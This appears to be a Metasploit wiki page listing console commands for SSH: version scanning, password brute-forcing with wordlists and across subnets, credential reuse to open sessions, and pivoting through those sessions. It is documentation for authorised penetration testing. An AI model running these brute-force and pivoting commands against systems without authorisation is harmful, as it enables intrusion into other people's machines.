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Metasploit Guide SSH

adfoster-r7 edited this page Apr 21, 2022 · 6 revisions

SSH Workflows

SSH Enumeration

Enumerate SSH version:

use auxiliary/scanner/ssh/ssh_version
run ssh://

SSH Bruteforce

Brute-force host with known user and password list:

use scanner/ssh/ssh_login
run ssh://known_user@ threads=50 pass_file=./rockyou.txt

Brute-force credentials:

use scanner/ssh/ssh_login
run ssh:// threads=50 user_file=./users.txt pass_file=./rockyou.txt

Brute-force credentials in a subnet:

use scanner/ssh/ssh_login
run cidr:/24:ssh://user:pass@ threads=50
run cidr:/24:ssh://user@ threads=50 pass_file=./rockyou.txt

SSH Login

If you have valid SSH credentials the ssh_login module will open a Metasploit session for you:

use scanner/ssh/ssh_login
run ssh://user:pass@

Re-using SSH credentials in a subnet:

use scanner/ssh/ssh_login
run cidr:/24:ssh://user:pass@ threads=50

Using an alternative port:

use scanner/ssh/ssh_login
run ssh://user:pass@

SSH Pivoting

Like Meterpreter, it is possible to port forward through a Metasploit SSH session:

route add ssh_session_id

To a route for the most recently opened Meterpreter session:

route add -1

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